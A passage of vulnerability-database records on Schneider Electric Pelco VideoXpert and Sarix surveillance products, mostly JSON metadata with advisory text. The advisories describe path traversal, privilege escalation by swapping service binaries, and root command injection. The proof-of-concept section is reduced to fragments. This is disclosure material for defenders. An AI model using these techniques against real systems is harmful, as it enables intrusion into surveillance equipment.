Exploiting these issues will allow an attacker to bypass security restrictions, execute arbitrary code and perform unauthorized actions. Information harvested may aid in launching further attacks. VideoXpert is a video management solution designed forscalability, fitting the needs surveillance operations of any size.VideoXpert Ultimate can also aggregate other VideoXpert systems,tying multiple video management systems into a single interface.The application is vulnerable to an elevation of privilegesvulnerability which can be used by a simple user that can changethe executable file with a binary of choice. The vulnerability existdue to the improper permissions, with the 'F' flag (full) for the'Users' group, for several binary files. The service is installedby default to start on system boot with LocalSystem privileges.Attackers can replace the binary with their rootkit, and on rebootthey get SYSTEM privileges.
VideoXpert services also suffer from an unquoted search path issueimpacting the 'VideoXpert Core' and 'VideoXpert Exports' servicesfor Windows deployed as part of the VideoXpert Setup bundle. A successful attempt would require the local user to be able to inserttheir code in the system root path undetected by the OS or other securityapplications where it could potentially be executed during applicationstartup or reboot. If successful, the local user’s code would executewith the elevated privileges of the application.Tested on: Microsoft Windows 7 Professional SP1 (EN)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-1067",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pelco videoxpert",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.1"
},
{
"model": "pelco videoxpert",
"scope": "eq",
"trust": 0.8,
"vendor": "schneider electric",
"version": "enterprise 2.1"
},
{
"model": "pelco videoxpert",
"scope": "lt",
"trust": 0.8,
"vendor": "schneider electric",
"version": "all versions"
},
{
"model": "electric pelco videoxpert enterprise",
"scope": "lt",
"trust": 0.6,
"vendor": "schneider",
"version": "2.1"
},
{
"model": "pelco videoxpert enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "schneider electric",
"version": "2.0"
},
{
"model": "pelco videoxpert enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "schneider electric",
"version": "2.1"
},
{
"model": "pelco videoxpert core admin portal directory traversal",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "2.0.41"
},
{
"model": "pelco videoxpert core admin portal directory traversal",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "1.14.7"
},
{
"model": "pelco videoxpert core admin portal directory traversal",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "1.12.105"
},
{
"model": "pelco videoxpert privilege escalations",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "core software 1.12.105"
},
{
"model": "pelco videoxpert privilege escalations",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "media gateway software 1.12.26"
},
{
"model": "pelco videoxpert privilege escalations",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "exports 1.12"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38304"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"db": "NVD",
"id": "CVE-2017-9965"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:schneider_electric:pelco_videoxpert",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Gjoko Krstic",
"sources": [
{
"db": "BID",
"id": "102338"
}
],
"trust": 0.3
},
"cve": "CVE-2017-9965",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-9965",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-38304",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2017-9965",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-9965",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2017-9965",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2017-38304",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201706-1083",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2017-5419",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5418",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38304"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1083"
},
{
"db": "NVD",
"id": "CVE-2017-9965"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exposure of sensitive information vulnerability exists in Schneider Electric\u0027s Pelco VideoXpert Enterprise versions 2.0 and prior. Using a directory traversal attack, an unauthorized person can view web server files. Schneider Electric Pelco VideoXpert Enterprise Contains a path traversal vulnerability.Information may be obtained. PelcoVideoXpertEnterprise is an enterprise video management system. \nExploiting these issues will allow an attacker to bypass security restrictions, execute arbitrary code and perform unauthorized actions. Information harvested may aid in launching further attacks. VideoXpert is a video management solution designed forscalability, fitting the needs surveillance operations of any size.VideoXpert Ultimate can also aggregate other VideoXpert systems,tying multiple video management systems into a single interface.The application is vulnerable to an elevation of privilegesvulnerability which can be used by a simple user that can changethe executable file with a binary of choice. The vulnerability existdue to the improper permissions, with the \u0027F\u0027 flag (full) for the\u0027Users\u0027 group, for several binary files. The service is installedby default to start on system boot with LocalSystem privileges.Attackers can replace the binary with their rootkit, and on rebootthey get SYSTEM privileges.\u003cbr/\u003e\u003cbr/\u003eVideoXpert services also suffer from an unquoted search path issueimpacting the \u0027VideoXpert Core\u0027 and \u0027VideoXpert Exports\u0027 servicesfor Windows deployed as part of the VideoXpert Setup bundle. A successful attempt would require the local user to be able to inserttheir code in the system root path undetected by the OS or other securityapplications where it could potentially be executed during applicationstartup or reboot. If successful, the local user\u2019s code would executewith the elevated privileges of the application.Tested on: Microsoft Windows 7 Professional SP1 (EN)",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9965"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"db": "CNVD",
"id": "CNVD-2017-38304"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelcovideoxpert_fd.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelcovideoxpert_eop.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "ICS CERT",
"id": "ICSA-17-355-02",
"trust": 3.5
},
{
"db": "NVD",
"id": "CVE-2017-9965",
"trust": 3.4
},
{
"db": "BID",
"id": "102338",
"trust": 1.5
},
{
"db": "SCHNEIDER",
"id": "SEVD-2017-339-01",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011852",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2017-38304",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "38559",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1083",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2017122204",
"trust": 0.2
},
{
"db": "CXSECURITY",
"id": "WLB-2017070077",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143317",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42311",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5419",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070078",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2017-9966",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143316",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42310",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5418",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38304"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1083"
},
{
"db": "NVD",
"id": "CVE-2017-9965"
}
]
},
"id": "VAR-201801-1067",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38304"
}
],
"trust": 1.3708333499999998
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38304"
}
]
},
"last_update_date": "2024-11-23T21:39:52.813000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "VideoXpert Enterprise Video Management System",
"trust": 0.8,
"url": "https://www.pelco.com/video-management-system/videoxpert"
},
{
"title": "Patch for SchneiderElectricPelcoVideoXpertEnterprise Directory Traversal Vulnerability (CNVD-2017-38304)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/111983"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38304"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"db": "NVD",
"id": "CVE-2017-9965"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.5,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-355-02"
},
{
"trust": 1.2,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2017-339-01/"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/102338"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9965"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9965"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/38559"
},
{
"trust": 0.3,
"url": "http://www.schneider-electric.com/site/home/index.cfm/ww/?selectcountry=true"
},
{
"trust": 0.2,
"url": "https://www.schneider-electric.com/b2b/en/support/cybersecurity/security-notifications.jsp"
},
{
"trust": 0.2,
"url": "https://download.schneider-electric.com/files?p_endoctype=technical+leaflet\u0026amp;p_file_id=8621588310\u0026amp;p_file_name=sevd-2017-339-01-+pelco+videoxpert+enterprise.pdf\u0026amp;p_reference=sevd-2017-339-01"
},
{
"trust": 0.2,
"url": "http://securityaffairs.co/wordpress/67108/hacking/pelco-videoxpert-flaws.html"
},
{
"trust": 0.2,
"url": "https://www.cybersecurity-help.cz/vdb/sb2017122204"
},
{
"trust": 0.2,
"url": "http://www.isssource.com/schneider-clears-pelco-vulnerabilities/"
},
{
"trust": 0.2,
"url": "http://www.securityweek.com/schneider-electric-patches-flaws-pelco-video-management-system"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42311/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070077"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143317"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129663"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9965"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42310/"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143316"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070078"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129662"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9966"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9966"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38304"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1083"
},
{
"db": "NVD",
"id": "CVE-2017-9965"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"db": "CNVD",
"id": "CNVD-2017-38304"
},
{
"db": "BID",
"id": "102338"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1083"
},
{
"db": "NVD",
"id": "CVE-2017-9965"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38304"
},
{
"date": "2017-12-21T00:00:00",
"db": "BID",
"id": "102338"
},
{
"date": "2018-01-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"date": "2017-06-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-1083"
},
{
"date": "2018-01-02T03:29:00.300000",
"db": "NVD",
"id": "CVE-2017-9965"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-13T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5419"
},
{
"date": "2018-01-13T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5418"
},
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38304"
},
{
"date": "2017-12-21T00:00:00",
"db": "BID",
"id": "102338"
},
{
"date": "2018-01-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"date": "2018-01-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201706-1083"
},
{
"date": "2024-11-21T03:37:15.997000",
"db": "NVD",
"id": "CVE-2017-9965"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201706-1083"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric Pelco VideoXpert Enterprise Path traversal vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011852"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-1083"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201706-1083"
}
],
"trust": 0.6
}
}
VAR-201803-1843
Vulnerability from variot - Updated: 2024-11-23 21:39A vulnerability exists in Schneider Electric's Pelco Sarix Professional in all firmware versions prior to 3.29.67 which could enable SSH service due to lack of authentication for /login/bin/set_param could enable SSH service. Schneider Electric Pelco Sarix Professional Contains an authentication vulnerability.Information may be obtained and information may be altered. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectricPelcoSarixProfessional is a video surveillance device from Schneider Electric, France. A security vulnerability exists in SchneiderElectricPelcoSarixProfessional with firmware prior to 3.29.67, which was caused by a program failing to authenticate to /login/bin/set_param. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1843",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "imp519-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp219-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp319-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp519-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imps110-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp219-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp519-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp319-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp219-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp319-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibps110-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp1110-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "mps110-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp519-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp319-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp219-1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imps110-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp1110-1e",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp1110-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "imp1110-1er",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "3.29.67"
},
{
"model": "ibp1110-1er",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ibps110-1er",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imp1110-1",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imps110-1e",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
